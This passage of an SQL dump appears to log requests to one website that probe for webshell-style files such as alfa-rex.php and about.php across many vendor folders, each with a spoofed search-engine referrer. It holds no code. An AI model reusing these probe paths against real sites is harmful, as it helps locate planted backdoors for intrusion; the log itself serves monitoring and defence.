00:00:00',301),(52129,'http://3s-technologies.com.tr/en/wp-includes/certificates/autoload_classmap.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:05:29','0000-00-00 00:00:00',301),(52130,'http://3s-technologies.com.tr/en/wp-includes/customize/autoload_classmap.php',NULL,'https://www.google.com/','',10,0,'2025-12-20 05:05:30','0000-00-00 00:00:00',301),(52131,'http://3s-technologies.com.tr/en/index/autoload_classmap.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:30','0000-00-00 00:00:00',301),(52132,'http://3s-technologies.com.tr/en/about/autoload_classmap.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:05:31','0000-00-00 00:00:00',301),(52133,'http://3s-technologies.com.tr/en/as/autoload_classmap.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:32','0000-00-00 00:00:00',301),(52134,'http://3s-technologies.com.tr/en/file/autoload_classmap.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:05:33','0000-00-00 00:00:00',301),(52135,'http://3s-technologies.com.tr/en/chosen/autoload_classmap.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:05:34','0000-00-00 00:00:00',301),(52136,'http://3s-technologies.com.tr/en/css/autoload_classmap.php',NULL,'https://duckduckgo.com/','',12,0,'2025-12-20 05:05:35','0000-00-00 00:00:00',301),(52137,'http://3s-technologies.com.tr/en/assets/kalervirus/form.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:36','0000-00-00 00:00:00',301),(52138,'http://3s-technologies.com.tr/en/assets/kalervirus/get.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:37','0000-00-00 00:00:00',301),(52139,'http://3s-technologies.com.tr/en/assets/kalervirus/go.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:38','0000-00-00 00:00:00',301),(52140,'http://3s-technologies.com.tr/en/cache/locks/file/lang/en/ocd.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:39','0000-00-00 00:00:00',301),(52141,'http://3s-technologies.com.tr/en/images/pages.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:40','0000-00-00 00:00:00',301),(52142,'http://3s-technologies.com.tr/en/vendor/bensampo/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:05:41','0000-00-00 00:00:00',301),(52143,'http://3s-technologies.com.tr/en/vendor/bensampo/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:05:42','0000-00-00 00:00:00',301),(52144,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:43','0000-00-00 00:00:00',301),(52145,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:05:44','0000-00-00 00:00:00',301),(52146,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/lang/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:05:45','0000-00-00 00:00:00',301),(52147,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/lang/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:46','0000-00-00 00:00:00',301),(52148,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/lang/en/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:46','0000-00-00 00:00:00',301),(52149,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/lang/en/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:05:47','0000-00-00 00:00:00',301),(52150,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/attributes/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:05:48','0000-00-00 00:00:00',301),(52151,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/attributes/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:05:49','0000-00-00 00:00:00',301),(52152,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/casts/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:05:50','0000-00-00 00:00:00',301),(52153,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/casts/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:51','0000-00-00 00:00:00',301),(52154,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/commands/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:52','0000-00-00 00:00:00',301),(52155,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/commands/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:05:53','0000-00-00 00:00:00',301),(52156,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/commands/stubs/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:53','0000-00-00 00:00:00',301),(52157,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/commands/stubs/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:54','0000-00-00 00:00:00',301),(52158,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/contracts/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:05:55','0000-00-00 00:00:00',301),(52159,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/contracts/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:05:56','0000-00-00 00:00:00',301),(52160,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/exceptions/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:57','0000-00-00 00:00:00',301),(52161,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/exceptions/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:05:58','0000-00-00 00:00:00',301),(52162,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/phpstan/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:59','0000-00-00 00:00:00',301),(52163,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/phpstan/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:06:00','0000-00-00 00:00:00',301),(52164,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/rector/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:01','0000-00-00 00:00:00',301),(52165,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/rector/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:02','0000-00-00 00:00:00',301),(52166,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/rules/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:02','0000-00-00 00:00:00',301),(52167,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/rules/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:03','0000-00-00 00:00:00',301),(52168,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/traits/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:04','0000-00-00 00:00:00',301),(52169,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/traits/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:05','0000-00-00 00:00:00',301),(52170,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:06:06','0000-00-00 00:00:00',301),(52171,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/src/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:07','0000-00-00 00:00:00',301),(52172,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/sym404/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:08','0000-00-00 00:00:00',301),(52173,'http://3s-technologies.com.tr/en/vendor/bensampo/laravel-enum/sym404/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:08','0000-00-00 00:00:00',301),(52174,'http://3s-technologies.com.tr/en/vendor/bin/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:09','0000-00-00 00:00:00',301),(52175,'http://3s-technologies.com.tr/en/vendor/bin/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:10','0000-00-00 00:00:00',301),(52176,'http://3s-technologies.com.tr/en/vendor/brick/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:11','0000-00-00 00:00:00',301),(52177,'http://3s-technologies.com.tr/en/vendor/brick/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:12','0000-00-00 00:00:00',301),(52178,'http://3s-technologies.com.tr/en/vendor/brick/math/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:13','0000-00-00 00:00:00',301),(52179,'http://3s-technologies.com.tr/en/vendor/brick/math/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:14','0000-00-00 00:00:00',301),(52180,'http://3s-technologies.com.tr/en/vendor/brick/math/src/exception/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:06:15','0000-00-00 00:00:00',301),(52181,'http://3s-technologies.com.tr/en/vendor/brick/math/src/exception/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:15','0000-00-00 00:00:00',301),(52182,'http://3s-technologies.com.tr/en/vendor/brick/math/src/internal/calculator/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:16','0000-00-00 00:00:00',301),(52183,'http://3s-technologies.com.tr/en/vendor/brick/math/src/internal/calculator/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:17','0000-00-00 00:00:00',301),(52184,'http://3s-technologies.com.tr/en/vendor/brick/math/src/internal/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:18','0000-00-00 00:00:00',301),(52185,'http://3s-technologies.com.tr/en/vendor/brick/math/src/internal/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:19','0000-00-00 00:00:00',301),(52186,'http://3s-technologies.com.tr/en/vendor/brick/math/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:21','0000-00-00 00:00:00',301),(52187,'http://3s-technologies.com.tr/en/vendor/brick/math/src/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:22','0000-00-00 00:00:00',301),(52188,'http://3s-technologies.com.tr/en/vendor/composer/about.php',NULL,'https://duckduckgo.com/','',8,0,'2025-12-20 05:06:22','0000-00-00 00:00:00',301),(52189,'http://3s-technologies.com.tr/en/vendor/composer/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:23','0000-00-00 00:00:00',301),(52190,'http://3s-technologies.com.tr/en/vendor/composer/class-map-generator/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:24','0000-00-00 00:00:00',301),(52191,'http://3s-technologies.com.tr/en/vendor/composer/class-map-generator/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:25','0000-00-00 00:00:00',301),(52192,'http://3s-technologies.com.tr/en/vendor/composer/class-map-generator/src/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:26','0000-00-00 00:00:00',301),(52193,'http://3s-technologies.com.tr/en/vendor/composer/class-map-generator/src/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:27','0000-00-00 00:00:00',301),(52194,'http://3s-technologies.com.tr/en/vendor/composer/pcre/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:28','0000-00-00 00:00:00',301),(52195,'http://3s-technologies.com.tr/en/vendor/composer/pcre/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:29','0000-00-00 00:00:00',301),(52196,'http://3s-technologies.com.tr/en/vendor/composer/pcre/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:30','0000-00-00 00:00:00',301),(52197,'http://3s-technologies.com.tr/en/vendor/composer/pcre/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:31','0000-00-00 00:00:00',301),(52198,'http://3s-technologies.com.tr/en/vendor/dflydev/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:06:31','0000-00-00 00:00:00',301),(52199,'http://3s-technologies.com.tr/en/vendor/dflydev/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:32','0000-00-00 00:00:00',301),(52200,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:33','0000-00-00 00:00:00',301),(52201,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:34','0000-00-00 00:00:00',301),(52202,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/src/exception/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:35','0000-00-00 00:00:00',301),(52203,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/src/exception/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:36','0000-00-00 00:00:00',301),(52204,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/src/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:37','0000-00-00 00:00:00',301),(52205,'http://3s-technologies.com.tr/en/vendor/dflydev/dot-access-data/src/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:37','0000-00-00 00:00:00',301),(52206,'http://3s-technologies.com.tr/en/vendor/doctrine/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:38','0000-00-00 00:00:00',301),(52207,'http://3s-technologies.com.tr/en/vendor/doctrine/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:06:39','0000-00-00 00:00:00',301),(52208,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:40','0000-00-00 00:00:00',301),(52209,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:41','0000-00-00 00:00:00',301),(52210,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/docs/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:42','0000-00-00 00:00:00',301),(52211,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/docs/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:06:43','0000-00-00 00:00:00',301),(52212,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/docs/en/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:44','0000-00-00 00:00:00',301),(52213,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/docs/en/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:45','0000-00-00 00:00:00',301),(52214,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/english/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:46','0000-00-00 00:00:00',301),(52215,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/english/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:46','0000-00-00 00:00:00',301),(52216,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/french/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:47','0000-00-00 00:00:00',301),(52217,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/french/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:48','0000-00-00 00:00:00',301),(52218,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/norwegianbokmal/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:49','0000-00-00 00:00:00',301),(52219,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/norwegianbokmal/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:06:50','0000-00-00 00:00:00',301),(52220,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/portuguese/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:51','0000-00-00 00:00:00',301),(52221,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/portuguese/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:52','0000-00-00 00:00:00',301),(52222,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/spanish/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:53','0000-00-00 00:00:00',301),(52223,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/spanish/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:54','0000-00-00 00:00:00',301),(52224,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/turkish/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:54','0000-00-00 00:00:00',301),(52225,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/turkish/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:06:55','0000-00-00 00:00:00',301),(52226,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:06:56','0000-00-00 00:00:00',301),(52227,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/rules/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:06:57','0000-00-00 00:00:00',301),(52228,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:58','0000-00-00 00:00:00',301),(52229,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/inflector/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:06:59','0000-00-00 00:00:00',301),(52230,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:00','0000-00-00 00:00:00',301),(52231,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/doctrine/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:01','0000-00-00 00:00:00',301),(52232,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:01','0000-00-00 00:00:00',301),(52233,'http://3s-technologies.com.tr/en/vendor/doctrine/inflector/lib/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:02','0000-00-00 00:00:00',301),(52234,'http://3s-technologies.com.tr/en/vendor/doctrine/lexer/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:03','0000-00-00 00:00:00',301),(52235,'http://3s-technologies.com.tr/en/vendor/doctrine/lexer/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:04','0000-00-00 00:00:00',301),(52236,'http://3s-technologies.com.tr/en/vendor/doctrine/lexer/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:05','0000-00-00 00:00:00',301),(52237,'http://3s-technologies.com.tr/en/vendor/doctrine/lexer/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:06','0000-00-00 00:00:00',301),(52238,'http://3s-technologies.com.tr/en/vendor/dragonmantank/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:06','0000-00-00 00:00:00',301),(52239,'http://3s-technologies.com.tr/en/vendor/dragonmantank/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:07','0000-00-00 00:00:00',301),(52240,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:08','0000-00-00 00:00:00',301),(52241,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:09','0000-00-00 00:00:00',301),(52242,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/src/cron/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:10','0000-00-00 00:00:00',301),(52243,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/src/cron/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:11','0000-00-00 00:00:00',301),(52244,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:12','0000-00-00 00:00:00',301),(52245,'http://3s-technologies.com.tr/en/vendor/dragonmantank/cron-expression/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:13','0000-00-00 00:00:00',301),(52246,'http://3s-technologies.com.tr/en/vendor/egulias/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:14','0000-00-00 00:00:00',301),(52247,'http://3s-technologies.com.tr/en/vendor/egulias/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:14','0000-00-00 00:00:00',301),(52248,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:16','0000-00-00 00:00:00',301),(52249,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:16','0000-00-00 00:00:00',301),(52250,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/parser/commentstrategy/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:17','0000-00-00 00:00:00',301),(52251,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/parser/commentstrategy/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:18','0000-00-00 00:00:00',301),(52252,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/parser/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:19','0000-00-00 00:00:00',301),(52253,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/parser/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:20','0000-00-00 00:00:00',301),(52254,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/result/reason/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:21','0000-00-00 00:00:00',301),(52255,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/result/reason/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:22','0000-00-00 00:00:00',301),(52256,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/result/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:23','0000-00-00 00:00:00',301),(52257,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/result/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:23','0000-00-00 00:00:00',301),(52258,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/validation/exception/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:24','0000-00-00 00:00:00',301),(52259,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/validation/exception/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:25','0000-00-00 00:00:00',301),(52260,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/validation/extra/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:26','0000-00-00 00:00:00',301),(52261,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/validation/extra/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:27','0000-00-00 00:00:00',301),(52262,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/validation/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:28','0000-00-00 00:00:00',301),(52263,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/warning/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:29','0000-00-00 00:00:00',301),(52264,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/warning/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:30','0000-00-00 00:00:00',301),(52265,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:30','0000-00-00 00:00:00',301),(52266,'http://3s-technologies.com.tr/en/vendor/egulias/email-validator/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:31','0000-00-00 00:00:00',301),(52267,'http://3s-technologies.com.tr/en/vendor/filp/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:32','0000-00-00 00:00:00',301),(52268,'http://3s-technologies.com.tr/en/vendor/filp/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:33','0000-00-00 00:00:00',301),(52269,'http://3s-technologies.com.tr/en/vendor/filp/whoops/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:34','0000-00-00 00:00:00',301),(52270,'http://3s-technologies.com.tr/en/vendor/filp/whoops/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:35','0000-00-00 00:00:00',301),(52271,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/exception/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:36','0000-00-00 00:00:00',301),(52272,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/exception/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:37','0000-00-00 00:00:00',301),(52273,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/handler/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:38','0000-00-00 00:00:00',301),(52274,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/handler/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:38','0000-00-00 00:00:00',301),(52275,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/inspector/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:39','0000-00-00 00:00:00',301),(52276,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/inspector/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:40','0000-00-00 00:00:00',301),(52277,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:41','0000-00-00 00:00:00',301),(52278,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:42','0000-00-00 00:00:00',301),(52279,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/css/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:43','0000-00-00 00:00:00',301),(52280,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/css/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:44','0000-00-00 00:00:00',301),(52281,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/js/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:07:45','0000-00-00 00:00:00',301),(52282,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/js/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:46','0000-00-00 00:00:00',301),(52283,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/views/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:07:46','0000-00-00 00:00:00',301),(52284,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/resources/views/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:47','0000-00-00 00:00:00',301),(52285,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/util/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:07:48','0000-00-00 00:00:00',301),(52286,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/util/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:49','0000-00-00 